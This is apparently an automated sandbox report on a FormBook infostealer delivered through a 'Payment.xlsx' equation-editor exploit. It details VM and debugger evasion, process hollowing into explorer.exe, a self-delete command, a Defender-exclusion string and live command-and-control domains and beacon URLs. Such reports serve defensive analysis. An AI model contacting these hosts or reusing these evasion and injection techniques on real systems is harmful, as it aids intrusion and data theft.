Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: Payment.xlsx Stream path 'EncryptedPackage' entropy: 7.99982132167 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2872, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2392 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2768 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3000 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2892 Thread sleep time: -102957s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3000 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2908 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2028 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 102957 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000008.00000000.2182958260.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000008.00000000.2174877263.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B10 LdrLoadDll, 7_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h] 7_2_00B426F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020026F8 mov eax, dword ptr fs:[00000030h] 9_2_020026F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 54.156.162.121 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.5.116.132 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.girlboyfriends.com
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.147 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.discjockeydelraybeach.com
Source: C:\Windows\explorer.exe Domain query: www.burundiacademyst.com
Source: C:\Windows\explorer.exe Network Connect: 157.7.107.165 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.210 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 108.177.174.182 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.donelys.com
Source: C:\Windows\explorer.exe Domain query: www.arfjkacsgatfzbazpdth.com
Source: C:\Windows\explorer.exe Domain query: www.pipienta.com
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 310000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 404048 Sample: Payment.xlsx Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 14 other signatures 2->62 9 EQNEDT32.EXE 12 2->9         started        14 EXCEL.EXE 38 24 2->14         started        process3 dnsIp4 40 will.kasraz.com 192.3.122.177, 49167, 80 AS-COLOCROSSINGUS United States 9->40 34 C:\Users\user\AppData\Local\...\so[1].exe, PE32 9->34 dropped 36 C:\Users\Public\vbc.exe, PE32 9->36 dropped 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->80 16 vbc.exe 9->16         started        38 C:\Users\user\Desktop\~$Payment.xlsx, data 14->38 dropped file5 signatures6 process7 signatures8 48 Multi AV Scanner detection for dropped file 16->48 50 Machine Learning detection for dropped file 16->50 52 Tries to detect virtualization through RDTSC time measurements 16->52 54 Injects a PE file into a foreign processes 16->54 19 vbc.exe 16->19         started        22 vbc.exe 16->22         started        24 vbc.exe 16->24         started        process9 signatures10 64 Modifies the context of a thread in another process (thread injection) 19->64 66 Maps a DLL or memory area into another process 19->66 68 Sample uses process hollowing technique 19->68 70 Queues an APC in another process (thread injection) 19->70 26 NAPSTAT.EXE 19->26         started        29 explorer.exe 19->29 injected process11 dnsIp12 72 Modifies the context of a thread in another process (thread injection) 26->72 74 Maps a DLL or memory area into another process 26->74 76 Tries to detect virtualization through RDTSC time measurements 26->76 32 cmd.exe 26->32         started        42 www.discjockeydelraybeach.com 108.177.174.182, 49170, 80 LEASEWEB-USA-LAX-11US United States 29->42 44 www.pipienta.com 157.7.107.165, 49174, 80 INTERQGMOInternetIncJP Japan 29->44 46 8 other IPs or domains 29->46 78 System process connects to network (likely due to code injection or exploit) 29->78 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.3.122.177
 will.kasraz.com United States
36352 AS-COLOCROSSINGUS true
54.156.162.121
 cdl-lb-1356093980.us-east-1.elb.amazonaws.com United States
14618 AMAZON-AESUS false
103.5.116.132
 www.arfjkacsgatfzbazpdth.com Japan 17408 ABOVE-AS-APAboveNetCommunicationsTaiwanTW true
157.7.107.165
 www.pipienta.com Japan 7506 INTERQGMOInternetIncJP true
198.54.117.210
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
108.177.174.182
 www.discjockeydelraybeach.com United States
395954 LEASEWEB-USA-LAX-11US true
66.235.200.147
 burundiacademyst.com United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.discjockeydelraybeach.com 108.177.174.182 true
will.kasraz.com 192.3.122.177 true
parkingpage.namecheap.com 198.54.117.210 true
burundiacademyst.com 66.235.200.147 true
www.arfjkacsgatfzbazpdth.com 103.5.116.132 true
cdl-lb-1356093980.us-east-1.elb.amazonaws.com 54.156.162.121 true
www.pipienta.com 157.7.107.165 true
www.burundiacademyst.com unknown unknown
www.girlboyfriends.com unknown unknown
www.donelys.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.donelys.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== true
  • Avira URL Cloud: safe
 unknown
http://www.girlboyfriends.com/8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 true
  • Avira URL Cloud: safe
 unknown
http://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 true
  • Avira URL Cloud: safe
 unknown